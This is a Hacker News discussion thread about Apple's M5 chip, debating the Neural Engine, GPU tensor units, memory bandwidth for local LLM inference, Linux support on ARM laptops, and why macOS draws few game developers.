Doesn’t that make sense, though, as each manipulates a different layer in the memory hierarchy, allowing the programmer to control the latency and throughput implications? I see it as a good thing.
hannesfur•5h ago
It’s unfortunate that this announcement is still unspecific about what they improved in the Neural Engine. Since all we know about the Neural Engine comes from Apple papers or reverse engineering efforts (https://github.com/hollance/neural-engine), it’s plausible that they addressed some quirks to enable better transformer performance. They have written quite interesting papers on transformers on the Neural Engine:

- https://machinelearning.apple.com/research/neural-engine-tra...

- https://machinelearning.apple.com/research/vision-transforme...

Things have definitely gotten better with MLX on the software side, though it still seems they could do more in that area (let’s see what the M5 Max brings). But even if they made big strides here, it won’t help previous generations, and the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

fooblaster•5h ago
MLX still doesn't use the neural engine, right? I still wish they would abandon that unit and just center everything around Metal and tensor units on the GPU.
zozbot234•5h ago
Wrt. language models/transformers, the neural engine/NPU is still potentially useful for the pre-processing step, which is generally compute-limited. For token generation you need memory bandwidth so GPU compute with neural/tensor accelerators is preferable.
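
A quick back-of-the-envelope of why token generation ends up bandwidth-bound (illustrative numbers I'm assuming here: ~153 GB/s of base-M5 bandwidth, ~3.5 GB of weights for a 4-bit 7B model, all weights read once per token):

    # tokens/s upper bound ~= bandwidth / bytes of weights read per token
    echo "scale=1; 153 / 3.5" | bc    # ~43.7 tokens/s, before any compute cost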
fooblaster•5h ago
I think I'd still rather have the hardware area put into tensor cores for the GPU instead of this unit that's only programmable with onnx.
hannesfur•4h ago
Oh, I overlooked that! You are right. Surprising… since Apple has shown that it’s possible through CoreML (https://github.com/apple/ml-ane-transformers)

I would hope that the Foundation Models (https://developer.apple.com/documentation/foundationmodels) use the neural engine.

hannesfur•4h ago
Edit: Foundation Models use the Neural Engine. They are referring to a Neural Engine compatible K/V cache in this announcement: https://machinelearning.apple.com/research/introducing-apple...
fooblaster•4h ago
The neural engine not having a native programming model makes it effectively a dead end for external model development. It seems like a legacy unit that was designed for CNNs with limited receptive fields, and just isn't programmable enough to be useful for the total set of models and their operators available today.
hannesfur•3h ago
That's sadly true; over in x86 land things don't look much better in my opinion. The corresponding accelerators on modern Intel and AMD CPUs (the "Copilot PCs") are very difficult to program as well. I would love to read a blog post about someone trying, though!
fooblaster•2h ago
I have a lot of the details there. Suffice to say it's a nightmare:

https://www.google.com/url?sa=t&source=web&rct=j&opi=8997844...

AMD is likely to back away from this IP relatively soon.

llm_nerd•3h ago
MLX is a training/research framework, and the work product is usually a CoreML model. A CoreML model will use any and all resources that are available to it, at least if the resource fits for the need.

The ANE is for very low power, very specific inference tasks. There is no universe where Apple abandons it, and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs. The ANE is how your iPhone extracts every bit of text from images and subject matter information from photos with little fanfare or heat, or without destroying your battery, among many other uses. It is extremely useful for what it does.

>tensor units on the GPU

The M5 / A19 Pro are the first chips with so-called tensor units. e.g. matmul on the GPU. The ANE used to be the only tensor-like thing on the system, albeit as mentioned designed to be super efficient and for very specific purposes. That doesn't mean Apple is going to abandon the ANE, and instead they made it faster and more capable again.

almostgotcaught•3h ago
> the work product is usually a CoreML model.

What work product? Who is running models on Apple hardware in prod?

llm_nerd•3h ago
An enormous number of people and products. I'm actually not sure if your comment is serious, because it seems to be of the "I don't, therefore no one does" variety.
bigyabai•3h ago
Enormous compared to what? Do you have any numbers, or are you going off what your X/Bluesky feed is telling you?
llm_nerd•3h ago
I'm super not interested in arguing with the peanut gallery (meaning people who don't know the platform but feel that they have absolute knowledge of it), but enough people have apps with CoreML models in them, running across a billion or so devices. Some of those models were developed or migrated with MLX.

You don't have to believe this. I could not care less if you don't.

Have a great day.

bigyabai•3h ago
I don't believe it. MLX is a proprietary model format and usually the last to get supported on Huggingface. Given that most iOS users aren't selecting their own models, I genuinely don't think your conjecture adds up. The majority of people are likely using safetensors and GGUF, not MLX.

If you had a source to cite then it would remove all doubt pretty quickly here. But your assumptions don't seem to align with how iOS users actually use their phone.

llm_nerd•3h ago
Cite a source? That CoreML models are prolific on Apple platforms? That Apple devices are prolific? Search for it yourself.

You seem set on MLX and apparently on your narrow view of what models are. This discussion was about ANE vs "tensor" units on the GPU, and someone happened to mention MLX in that context. I clarified the role of MLX, but that from an inference perspective most deployments are CoreML, which will automatically use ANE if the model or some subset fits (which is actually fairly rare as it's a very limited -- albeit speedy and power efficient -- bit of hardware). These are basic facts.

>how iOS users actually use their phone.

What does this even mean? Do you think I mean people are running Qwen3-Embedding-4B in pytorch on their device or something? Loads of apps, including mobile games, have models in them now. This is not rare, and most users are blissfully unaware.

kanaffa12345•2h ago
> That CoreML models are prolific on Apple platforms? That Apple devices are prolific?

correct and non-controversial

> An enormous number of people and products [use CoreML on Apple platforms]

non-sequitur

EDIT: i see people are not aware of

https://en.wikipedia.org/wiki/Simpson%27s_paradox

kanaffa12345•3h ago
> I'm super not interested in arguing with the peanut gallery

i love blustery nerds lol. what if i told you i'm a coreml contrib and i know for a fact you're wrong?

llm_nerd•2h ago
Logging into the alt for this? Good god.

It would help if you would explain what I said that is wrong. You know, as the "haven't logged in in three years but pulled out the alt for this" CoreML contributor you are. This is an especially weird bit of trolling given that nothing I said is even remotely contentious; it's utterly banal facts.

koolala•2h ago
Can you share an example of the apps you mean? Maybe it would clear up any confusion.
zozbot234•3h ago
> ...and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs

That seems like a strange comment. I've remarked in this thread (and other threads on this site) about what's known re: low-level ANE capabilities, and it seems to have significant potential overall, even for some part of LLM processing. I'm not expecting it to be best-in-class at everything, though. Just like most other NPUs that are also showing up on recent laptop hardware.

trymas•5h ago
> the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

As you said - it won’t help previous generations, though since last year (or two??) all Macs start with 16GB of memory. Even entry-level MacBook Airs.

hannesfur•4h ago
That's true! I was referring to their wider lineup, especially the iPad, where users will expect the same performance as on the Macs (they paid for an Mx chip), and they sold me an iPad Air this year that comes with a really fast M3 and still only 8 GB of RAM (you only get 16 on the iPad Pro, btw, if you go with at least 1TB of storage on the M4 one)
moi2388•4h ago
Why would you expect the same performance on iPad and MacBook Pro?

The latter has up to 128GB of memory?

hannesfur•4h ago
You probably wouldn’t with a Pro, but you might between an iPad Pro and a MacBook Air. With the Foundation Models API they basically said that there will be one size of model for the entire platform, making smarter models on a MacBook Pro unrealistic and only faster ones possible.
LoganDark•4h ago
Isn't Private Cloud Compute already enabling the more powerful models to be run on the server? That way the on-device models don't have as much pressure to be The One.
moi2388•4h ago
That’s fair
doug_durham•1h ago
"They sold me"? You me you bought.
raverbashing•3h ago
I bet Cook authorized the upgrade with gritted teeth, and I was all for it
liuliu•4h ago
Faster compute helps, for things like vision language models that require a bigger context to be filled. My understanding is that the ANE is still optimized for convolution loads and compute efficiency, while the new neural accelerators are optimized for flexibility and performance.
zozbot234•4h ago
The old ANE enabled arbitrary statically scheduled multiply-add, of INT8 or FP16. That's good for convolution but not specifically geared for it.
liuliu•3h ago
I am not an expert on ANE, but I think it is related to the size of register files and how that is smaller than what we need for GEMM on modern transformers (especially these fat ones with MoE).
zozbot234•3h ago
AIUI the ANE makes use of data in unified memory, not in the register file. So this wouldn't be an inherent limitation. (OTOH, that's why it wastes memory bandwidth for most newer transformer models, which use heavily quantized data - the ANE will have to read padded/unquantized values and the fraction of memory bandwidth that's used for that padding is pure waste.)
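
To put a number on that waste (assuming INT4 weights that the ANE can only read padded out to FP16):

    # 4 payload bits out of every 16 bits moved -> 75% of read bandwidth is padding
    echo "scale=2; (16 - 4) / 16" | bc    # .75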
hannesfur•4h ago
That would be an interesting approach if true. I hope someone gets to the bottom of it once we have hardware in our hands.
JKCalhoun•4h ago
I can only guess that significant changes in hardware have longer lead times than software (for example). I suppose I am not expecting anything game-changing until the M6.
zuspotirko•3h ago
ofc true. Unified memory is always less than VRAM. And my 16GB of VRAM isn't enough.

But I think it's also a huge issue that Apple makes storage so expensive. If Apple wants local AI to answer your questions, it should be able to take your calendar, emails, text messages, photos, journal entries, etc. into account. It can't do that as nicely as long as customers opt for only 256GB or 1TB devices due to cost

jdlyga•5h ago
If only the Windows ecosystem could make the processor transition as smooth as Mac.
lostmsu•4h ago
I don't think it is the ecosystem. The ARM CPUs not from Apple are just too slow.
wmf•3h ago
X Elite and N1X are fine; the problem is with Windows.
bigyabai•10m ago
As someone who admins Linux and Windows ARM machines, rest assured the issue is not just with Windows. ARM support is best-effort on most distros, and still fairly incomplete even on nixpkgs and Debian unstable.
kotaKat•5h ago
Surprised they aren’t beating the “performance per watt” drum they normally would be on Mx releases. I’m assuming this will be a bit of a snoozer until the M5X/M5 Ultra or an M6 hits the pipeline.

If anything, these refreshes let them get rid of the last old crap on the line for M1 and M2, tie up loose ends with Walmart for the $599 M1 Air they still make for ‘em, and start shipping out the A18 Pro-based MacBooks in November.

ajross•1h ago
They don't have a new process to launch on, so one wouldn't expect a power metric to improve at all.
sbbq•5h ago
The chips are great. Now they just need to improve the quite stagnant laptop hardware to go with it.
alberth•5h ago
Vision Pro went from M2 to M5, that's quite a jump in horse-power.
adamschwartz•3h ago
Also ~200g heavier due in part to the counterweight in the new strap.
outcoldman•5h ago
Marketing:

M5 announcement [1] says 4x the peak GPU compute performance for AI compared to M4. I guess in the lab?

Both the iPad and MBP M5 [2][3] say "delivering up to 3.5x the AI performance". But all the examples of AI (in [3]) are 1.2-2.3X faster than the M4. So where is this 3.5X coming from? What tests did Apple do to show that?

---

1. https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-th...

2. https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

3. https://www.apple.com/newsroom/2025/10/apple-introduces-the-...

relativeadv•5h ago
It's not uncommon for Apple and others to compare against two generations ago rather than the immediately preceding one.
outcoldman•3h ago
Everything I referenced compares against the M4. I left out the comparison with the M1.
storus•2h ago
The M5 is supposed to support FP4 natively, which would explain the speedup on Q4-quantized models (down from BF16).
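
For anyone curious, a minimal numpy sketch of what symmetric 4-bit quantization does to the weights (illustrative only; real Q4 schemes such as the GGUF formats use per-block scales and sometimes offsets):

    import numpy as np

    def quantize_q4(w, block=32):
        # One scale per block of weights; the int4 range is -8..7.
        w = w.reshape(-1, block)
        scale = np.abs(w).max(axis=1, keepdims=True) / 7.0
        q = np.clip(np.round(w / scale), -8, 7).astype(np.int8)
        return q, scale

    w = np.random.randn(4096, 32).astype(np.float32)
    q, s = quantize_q4(w)
    err = np.abs(w - (q * s).reshape(w.shape)).max()
    print(f"max abs error: {err:.3f} (weights now take 4 bits instead of 16)")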
exabrial•5h ago
> A nearly 30 percent increase in unified memory bandwidth to 153GB/s

I'll believe benchmarks over marketing claims, but here's an observation and a question.

1. The AMD EPYC 4585PX has ~89GB/s, with pretty good latency, as long as you use 2 DIMMs

2. How does this compare to the memory bandwidth and latency of the M1, M2, M3, and M4 in reality, with all the caveats? It seems like the M1 was a monumental leap forward, and everything since has been a retraction.
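
For reference on point 2, the published base-chip figures have actually climbed every generation; the step backwards people notice is in the Pro/Max tiers (the M1 Max and M2 Max were 400GB/s). A quick sketch of the base-chip deltas from Apple's published numbers:

    # Published unified memory bandwidth of the base M-series chips (GB/s).
    bw = {"M1": 68.25, "M2": 100, "M3": 100, "M4": 120, "M5": 153}
    prev = None
    for chip, gbs in bw.items():
        delta = f" ({gbs / prev - 1:+.0%} vs prior gen)" if prev else ""
        print(f"{chip}: {gbs:g} GB/s{delta}")
        prev = gbs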

exabrial•5h ago
Apple's software division has lost their way. They've done nothing but add flashy features and move buttons around, deprecating things and breaking backwards compatibility (yeah, 32-bit has been a while now, but alas), meanwhile retreating on stability.

Snow Leopard remains the company's crowning achievement. Zero bloatware, zero "mobile features on desktop" (wtf is this even a thing?), tuned for absolute speed and stability.

raw_anon_1111•4h ago
They completely removed hardware support for 32 bit software.
morshu9001•10m ago
This was in the Intel generation of Macs. If Windows can support 32-bit software then so should Mac, along with all that 64-bit software that got broken in random Mac updates.

Ironically I can still run old 32-bit Windows software in Wine on my M1 Mac. Windows software is more stable on a Mac than Mac software.

badc0ffee•2h ago
I've heard about rounded corners and low information density windows in Tahoe, but what "mobile features on desktop" are in Sequoia and earlier? The App Store? Launchpad? iCloud? Notifications? You don't need to use those.
morshu9001•11m ago
I liked Snow Leopard too; it was indeed the last focused Mac OS, but there was some memory-related bug that made me update past it. The new OSes aren't so bad, but yeah, I don't touch any of the new features.
yalogin•5h ago
It feels like Apple is "a square peg in a round hole" when it comes to AI, at least for now.

They are not the hardware provider like Nvidia, and they don't do the software and services like OpenAI or even Microsoft/Oracle. So they are struggling to find a foothold here. I am sure they are working on a lot of things, but the only way to showcase them is through their phone, which ironically enough feels like not the best path for Apple.

Apple’s best option is to put LLMs locally on the phone and claim privacy (which is true), but they may end up in the same Siri-vs-others situation, where Siri is always the dumber one.

It will be interesting to see how this plays out.

mirekrusin•5h ago
Being late to the AI race, or not entering it from the training side, is not necessarily bad; others have burned tons of money. If Apple enters with their hardware first (only?), it may disrupt the status quo from the consumer side. It's not impossible that they'll produce hardware everybody will want for running local models on par with closed ones. If this happens, it may change where real money flows (as opposed to investor money based on imaginary valuations, which can evaporate).
bob1029•3h ago
> Being late

https://en.wikipedia.org/wiki/First-mover_advantage#Second-m...

mft_•3h ago
They are the leader in manufacturing consumer systems with enough high-bandwidth memory to run decent-sized LLMs locally with reasonable performance. If you want to run something that needs >=32GB of memory (which is frankly bottom-end for a somewhat capable LLM), they're your only widely available choice (otherwise you've got the rare Strix Halo AI Max+ 395 chip, or you need multiple GPUs, or maybe a self-build based around a Threadripper).

This might not be widely recognised, as the proportion of people wanting to run capable LLMs locally is likely a rounding error versus the people who use ChatGPT/Claude/Gemini regularly. It's also not something that Apple markets on, as they can't monetize it. However, as time goes on and memory and compute gradually decrease in price, and maybe as local LLMs continue to increase in ability (?), it may become more and more relevant.
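
The arithmetic behind that >=32GB figure is easy to sketch (a rule of thumb only; the ~20% overhead for KV cache, activations, and runtime is an assumption and varies a lot with context length):

    def footprint_gb(params_billion, bits_per_weight, overhead=1.2):
        # Weights plus an assumed ~20% for KV cache, activations, runtime.
        return params_billion * bits_per_weight / 8 * overhead

    for name, p, bits in [("8B @ Q4", 8, 4), ("32B @ Q4", 32, 4),
                          ("70B @ Q4", 70, 4), ("32B @ FP16", 32, 16)]:
        print(f"{name}: ~{footprint_gb(p, bits):.0f} GB")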

yalogin•1h ago
All the current use cases, the ones that caught the public eye, just don't need locally run LLMs. Apple has to come up with functionality that can work with on-device LLMs, and that is hard to do. There aren't that many use cases for it, as the input vectors all map to an app or the camera. Even then, a full-fledged LLM is always better than a quantized, low-precision one running locally. Yeah, increased compute is the way, but not a silver bullet, as vision- and audio-bound LLMs require large amounts of memory.
bfrog•5h ago
The big win would be a Linux-capable device. I don't have any interest in macOS, but the Apple M-series parts always seem amazing.

In theory this would be where Qualcomm would come in and provide something, but in practice they seem to be stuck in Qualcomm land, where only lawyers matter and actual users and developers can get stuffed.

cogman10•5h ago
Yeah, this is the biggest hole in ARM offerings.

The only well supported devices are either phones or servers with very little in between.

Even common consumer devices like wifi routers will have ARM SoCs pinned to the kernel version they shipped with, which gets supported for 1 to 2 years at most.

mrkeen•5h ago
I have a pretty good time on Asahi Fedora (MacBook Air M1). It supposedly also supports M2 but no higher.

And it's a PITA to install (it needs to be started from within macOS, using scripts, with the partitions already in a good state).

Gethsemane•4h ago
If I was less lazy I could probably find this answer online, but how do you find the battery life these days? I'd love to make the switch, but that's the only thing holding me back...
2OEH8eoCRo0•4h ago
How's Thunderbolt and DisplayPort alt mode?
mysteria•22m ago
The issue is that it's hacky, and in that case I'd rather go with an Intel or AMD x86 system with more or less out-of-the-box Linux support. What we're looking for is a performant ARM system where Linux is a first-class citizen.
walterbell•4h ago
Apparently the Windows exclusivity period has ended, so Google will support Android and ChromeOS on Qualcomm X2-based devices, https://news.ycombinator.com/item?id=45368167
mittermayr•5h ago
This morning I was looking to maybe replace my Macbook Pro 2018, which had the horrible keyboard and finally seems to be crippled enough to not be fun to use anymore — now this!

However, I have been disappointed by Apple too many times (they wouldn't replace my keyboard despite their highly flamed design faux pas, I've had to replace the battery twice by now, etc.).

Two years ago I finally stopped replacing their expensive external keyboards, which I used to buy once a year or every other year (due to broken key hinges), and have been incredibly pleasantly surprised by getting used to the MX Keys now. Much better built, incredible mileage for the price. Plus, I can easily switch and use them on my Windows PC, too.

So, about the MacBook: if I were to switch mobile computing over to Windows, what could I replace it with? My main machine is still a Mac Mini M2 Pro, which is perfect value for the price. I like the Surface as a concept (replaceable keyboards are a fantastic idea; the battery, however, is super iffy nonsense), and I've got a Surface Pro 6 around, but it's essentially the same gloss premium I don't need for my use.

Are there any much-cheaper but somewhat comparable laptops (12h+ battery, 1 TB disk, 16-32GB RAM, 2k+ Display) with reasonable build quality? Does bypassing the inherent premium of all the Apple gloss open up any useful options? Or is Apple actually providing the best value here?

Would love to hear from non-Surface, non-Thinkpad (I love it, but) folks who've got some recommendations for sub $1k laptops.

Not my main machine, but something I take along train rides, or when going to clients, or sometimes working offsite for a day.

vachina•2h ago
LG Gram SuperSlim. Very light (900 grams). I once went hiking with it and forgot the laptop was still in the bag.

But it's really only capable of high performance in short bursts, because of the extremely small thermal mass.

mittermayr•2h ago
Thanks for the hint; spec-wise, this is exactly what I meant: 1TB SSD, 16GB RAM, 16 hours of battery, very nice. Then I saw it's 1700 EUR where I am at the moment, so pretty much MacBook Pro price :(
alberth•5h ago
Apple is binning the iPad Pro chips:

   Storage      CPU
   ≤ 512GB      3 P-cores (and 6 E-cores)
   1TB+         4 P-cores (and 6 E-cores)
https://www.apple.com/ipad-pro/specs/
tempaccount420•46m ago
Storage-gating is really disgusting considering how much Apple charges for storage.
criddell•5h ago
I wish I could get the nano-texture glass on a lower-spec iPad Pro. I probably only need the 512 GB model, and the glass is only available on the 1 and 2 TB models.
nblgbg•5h ago
32GB is the maximum memory configuration for the 14-inch laptop, which isn’t sufficient for running local LLMs. I think a Mac Studio or Mac Mini with higher memory would be more useful.
reacharavindh•4h ago
One thing that would be a nice quality-of-life improvement in the MacBook (Air/Pro) is built-in 5G connectivity. I'd spring for the convenience of not needing to connect to a hotspot, draining precious battery on my phone. I thought we were closer, given Apple started making their own modems, but it is still a miss.
port3000•2h ago
They want you to buy the Apple phone and pair it, so they sell more.
pier25•4h ago
Does the M5 feature the UltraFusion connector which would enable the Ultra variant?
ozaiworld•4h ago
that would likely only be present on the Max chip of the M5 generation
pier25•1h ago
thanks I had always assumed it needed to be present in the base design of the chip
dmitshur•4h ago
The claimed 1.6x increase in video game frame rate compared to M4 seems pretty good. Looking forward to seeing it tested out in practice.
Insanity•4h ago
I assume they released this ahead of their end-of-month event in response to all the leaks from the past few weeks.
superkuh•4h ago
I know it's only shared system RAM and not VRAM, but the M5's 153GB/s isn't going to be very fast for AI inference. A fairly old RTX 3060 12GB does 360GB/s. But I guess quantity is a quality all its own when it comes to RAM and inference.
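
That bandwidth gap translates directly into a decode-speed ceiling: for a memory-bound LLM, every generated token streams the whole weight set from RAM once. A rough sketch (ignoring KV-cache traffic and compute limits; the model size is hypothetical):

    def max_tok_per_sec(bandwidth_gbs, model_gb):
        # Upper bound: one full pass over the weights per generated token.
        return bandwidth_gbs / model_gb

    model_gb = 4.5  # e.g. an ~8B model at Q4
    for name, bw in [("M5", 153), ("RTX 3060", 360), ("M2 Max", 400)]:
        print(f"{name}: <= {max_tok_per_sec(bw, model_gb):.0f} tok/s")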
sidcool•4h ago
I wonder if they informed Jensen about it.
davidw•4h ago
Are we headed back to the bad old days of very proprietary systems, where megacorps dictate everything?
GeekyBear•4h ago
I'd argue that calling the new matrix multiplication unit they added to the GPU cores a neural engine instead of a tensor processing unit is a branding error that will lead to confusion.

The existing neural engine's function is to maximize power efficiency, not flexible performance on models of any size.

bigyabai•3h ago
I'd argue that Apple's definition of "neural engine" was entirely different from what the greater desktop, edge and datacenter markets already considered a "neural engine" to be.

It's an improvement, nomenclature-wise.

ThrowawayR2•4h ago
A computing device named M5 with highly advanced AI capabilities meant for enterprise (or Enterprise) computing environments? Uh-oh, I think I'll pass; I saw this episode of Star Trek (TOS: The Ultimate Computer) before. Hope the owner's manual comes with a warning not to wear a red shirt anywhere near it, dohohoho.

(Perhaps it would be safer to wait for The Next Generation?)

ironman1478•4h ago
It's surprising to me that Macs aren't a more popular target for games. They're extremely capable machines, and they're console-like in that there isn't very much variation in hardware, as opposed to traditional PC gaming. I would think it's easier to develop a game for a MacBook than for a Windows machine, where you never know what hardware setup the user will have.
LtdJorge•4h ago
Metal is a very recent API compared to DirectX and OpenGL. Also, there are very few people on Mac, and even fewer who also play video games. There are almost no libraries and tooling built around Metal and the Mac SDKs, and a very small audience, so it doesn't make financial sense.
sosodev•4h ago
It's easier to develop a game for a mac in some ways but you reach a tiny fraction of gamers that way.
hangonhn•3h ago
I wonder how that might look once you factor in Apple TV devices. They're pretty weak devices now but future ones can come with M-class CPUs. That's a huge source of potential revenue for Apple.
amluto•3h ago
The current Apple TV is, in many respects, unbelievably bad, and it has nothing to do with the CPU.

Open up the YouTube app and try to navigate the UI. It’s okay but not really up to the Apple standard. Now try to enter text in the search bar. A nearby iPhone will helpfully offer to let you use it like a keyboard. You get a text field, and you can type, and keystrokes are slowly and not entirely reliably propagated to the TV, but text does not stay in sync. And after a few seconds, in the middle of typing, the TV will decide you’re done typing and move focus to a search result, and the phone won’t notice, and it gets completely desynchronized.

ascagnel_•2h ago
The YouTube app has never been good and never felt like a native app -- it's a wrapper around web tech.

More importantly for games, though, is the awful storage architecture around the TV boxes. Games have to slice themselves up into 2GB storage chunks, which can be purged from the system whenever the game isn't actively running. The game has to be aware of missing chunks and download them on-demand.

It makes open-world games nearly impossible, and it makes anything with significant storage requirements effectively impossible. As much as Apple likes to push the iOS port of Death Stranding, that game cannot run on tvOS as currently architected for that reason.

ProfessorZoom•4h ago
I think it depends on how easy it is for a dev to deploy to Apple. The M1 was great at running Call of Duty in a Windows emulator. The iPhone can run the newest Resident Evil. Apple needs to do more to convince developers to deploy to Mac.
jayd16•4h ago
Mac dev sucks. You're forced to use macOS and Xcode (for the final build anyway). You're not able to virtualize the build machines.

Apple is actively hostile to how you would build for Linux or PC or console.

nasseri•4h ago
This is simply not the case. Every major game framework/engine targets Mac natively.

If you are building your engine/game from scratch, you absolutely do not need to use Xcode

jayd16•4h ago
Why don't you look through the Unreal and Unity docs and see if you can make a build without a Mac and Xcode.
nasseri•3h ago
Yeah, you’re right; I skipped over the part where you said the final build requires it.

Nonetheless that’s a small fraction of the time spent actually developing the game.

jayd16•3h ago
Ideally, it's a continuous part of development because you're making daily (or more) builds and testing them.

That makes it a continuous headache to keep your Mac builders up.

It means you need to double your dev hardware costs or more, as you need a gaming PC to target your core audience and Macs to handle the Mac bugs.

It means your mac build machines are special snowflakes because you can't just use VMs.

The list goes on and on of Mac being actively hostile to the process.

Sure, Rider running on a Mac is pleasant, but that's not the issue.

nasseri•3h ago
I think I misunderstood your point as “developing a game on Mac sucks”, vs “developing for Mac without a Mac sucks” which I absolutely can’t disagree with
coldtea•4h ago
>Mac dev sucks. You're forced to use macos and xcode (for the final build anyway)

Having to use xcode "for the final build" is irrelevant to the game development experience.

jayd16•3h ago
If you're an indie with just PC hardware it sure as hell matters.
matthew-wegner•3h ago
> You're not able to virtualize the build machines.

Sure you can. And officially, too. Apple still ships a bunch of virtualization drivers in macOS itself. Have a look:

/System/Library/Extensions/IONetworkingFamily.kext/Contents/PlugIns/AppleVmxnet3Ethernet.kext

Whether or not you're using ESXi, or want to, is an entirely different question. But "you're not able to" is simply incorrect. I virtualize several build agents and have for years with no issues.

macOS 26 is the last major version to support Intel, so once macOS 28 is the latest this will probably become impossible (macOS 26 should be able to run Xcode 27, though the Intel removal may break the usual pattern of supporting the previous year's OS).

GTP•3h ago
> Apple still ships a bunch of virtualization drivers in macOS itself.

I think OP means virtualizing on something that isn't Apple.

jayd16•3h ago
Interesting. The last I looked into it, you could only officially do this on Mac hardware (defeating the purpose).

You can get Xcode building for ARM Macs on PC hardware with this?

ikamm•4h ago
- have to build using Xcode on macOS

- have to pay Apple to have your executable signed

- poor Vulkan support

The hardware has never been an issue, it's Apple's walled garden ecosystem.

lazypenguin•4h ago
As far as I’ve seen, Apple is to blame here as they usually make it harder to target their platform and don’t really try to cooperate with the rest of the industry.

As a game developer, I have to literally purchase Apple hardware to test rather than being able to conveniently download a VM

neogodless•3h ago
I'm not a subject matter expert, but I do find it a little odd to read the second half of that. I'd expect, beyond development/debugging, there's certainly a phase of testing that requires hardware that matches your target system?

Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation, which is probably running Windows. Especially for consoles like XBOX One or newer, and PS4 or newer, which are essentially PCs. And then builds get passed off to a team that has the hardware.

Is anyone developing games for Windows on Apple hardware? Do they run Parallels and call it a day? How is the gaming performance? If the answers to those 3 questions are "yes, yes, great", then Apple supports PC game development better than they support Apple game development?

throwuxiytayq•3h ago
> Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation

I don’t think anybody does this. I haven’t heard about official emulators for any of the mainstream consoles. Emulation would be prohibitively slow.

Developers usually test on dedicated devkits which are a version of the target console (often with slightly better specs as dev builds need more memory and run more slowly). This is annoying, slow and difficult, but at least you can get these dev kits, usually for a decent price, and there’s a point to trying to ship on those platforms. Meanwhile, nobody plays games on macs, and Apple is making zero effort to bring in the developers or the gamers. It’s a no-chicken-and-no-egg situation, really.

lazypenguin•15m ago
Basically you are correct: macOS has to be treated like a console in that way, except you get all the downsides of that development workflow with none of the upsides. The consoles provide excellent debugging and other tools for targeting their platforms; can't say the same for macOS.

For testing, I can do a large amount of testing in a VM for my game. Maybe not 100%, and not full user testing, but nothing beats running on the native hardware and doing alpha/beta with real users.

Also, since I can pass through hardware to my VM I can get quite good performance by passing through a physical GPU for example. This is possible and quite straightforward to do on a Linux host. I'm not sure if it's possible using Parallels.

cesarvarela•3h ago
I'm sure you literally purchased Nvidia hardware for game development.
stronglikedan•2h ago
A component is much cheaper than an entire dedicated system (which would of course contain a similar component).
cesarvarela•27m ago
I don't know; a 5090 costs about 3k, a 5070 about 500. You can either buy a MacBook Pro or a Mac Mini. Seems reasonable.
whatever1•3h ago
You do it for Xbox and PlayStation and Nintendo.
jjtheblunt•3h ago
For games, how would you test in a VM, when games so explicitly want direct hardware access?

I am obviously misunderstanding something, I mean.

zulban•2h ago
I run Linux and test my Windows releases on a VM. It works great.

Sure, I'm not doing performance benchmarking and it's just smoke tests and basic user stories, but that's all that 98% of indie developers do for cross platform support.

Apple has been intensely stupid as a platform to launch on, though I did do it eventually. I didn't like Apple before and now I like it even less.

lazypenguin•26m ago
I develop a game that easily runs on much weaker hardware and runs fine in a VM; I would say most simple 3D & 2D games would work fine in a VM on modern hardware.

However, these days it's possible to pass through hardware to your VM, so I would be able to pass through a 2nd GPU to macOS... if it would let me run it as a guest.

Liquix•23m ago
On Linux, KVM provides passthrough for GPUs and other hardware, so the VM "steals" the passed-through resources from the host and provides near-native performance.
spogbiper•4h ago
You have to release major titles for Windows and consoles, because there are tons of customers using them.

So a Mac port, even if simple, is additional cost. There you have the classic chicken-and-egg problem: the cost doesn't seem to be justified by the number of potential sales, so major studios ignore the platform. And as long as they do, gamers ignore the platform.

I've seen it suggested that Apple could solve this standoff by funding the ports; maybe they have done this a few times. But Apple doesn't seem to care much about it.

leshenka•3h ago
I was very surprised, and pleasantly too, that Cyberpunk 2077 can maintain 60FPS (14", M4 Pro, 24GB RAM) with only occasional dips. Not at full resolution (actually around Full HD), but at least without "frame generation". Turning frame generation on, it can output 90-100 FPS depending on the environment, but VSync is disabled, so dips become way more noticeable.

It even has a "for this Mac" preset, which is good enough that you don't need to tinker with settings to have a decent experience.

The game is paused, almost "frozen", if it's not visible on screen, which helps with battery (it can be in the background without any noticeable impact on battery or temperature). Overall a way better experience than I expected.

GTP•3h ago
Until a few years ago, it was common for gamers to assemble their own PC, something you can't do with a Mac. Not sure if this is still common among gamers though.
LarsDu88•1h ago
The advent of silicon interposer technology has made modular memory and separate CPU/GPU all but obsolete, IMO.

The communication bandwidth you can achieve by putting the CPU, GPU, and memory together at the factory is much higher than having these components separate.

Sad for enthusiasts, but practically inevitable

shantara•3h ago
The main roadblock for porting the games to Mac has never been the hardware, but Apple themselves. Their entire attitude is that they can do whatever they please with their platforms, and expect the developers to adjust to the changes, no matter how breaking. It’s a constant support treadmill, fixing the stuff that Apple broke in your previously perfectly functioning product after every update. If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional. This works for apps, but it‘s completely antithetical to the way game development processes on any other platform are structured. You finish a project, release it, do a patch cycle, and move on.

And that’s not even talking about porting the game to either Metal or an absolutely ancient OpenGL version that could be removed with any upcoming OS version. A significant effort just to address a tiny market.

astrange•3h ago
> If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional.

IIRC developers literally got 15 years of warning about that one.

bigyabai•3h ago
IIRC that didn't convince many developers to revisit their software. I still have hard drives full of Pro Tools projects that open on Mojave but error on Catalina. Not to mention all the Steam games that launch fine on Windows/Linux but error on macOS...
astrange•2h ago
Yes, game developers can't revisit old games because they throw out the dev environments when they're done, or their middleware can't get updated, etc.

But it's not possible to keep maintaining 32-bit forever. That's twice the code and it can't support a bunch of important security features, modern ABIs, etc. It would be better to run old programs in a VM of an old OS with no network access.

bigyabai•3m ago
> But it's not possible to keep maintaining 32-bit forever.

Apple had the money to support it, we both know that. They just didn't respect their Mac owners enough, Apple saw more value in making them dogfood iOS changes since that's where all the iOS devs are held captive. Security was never a realistic excuse considering how much real zombie code still exists in macOS.

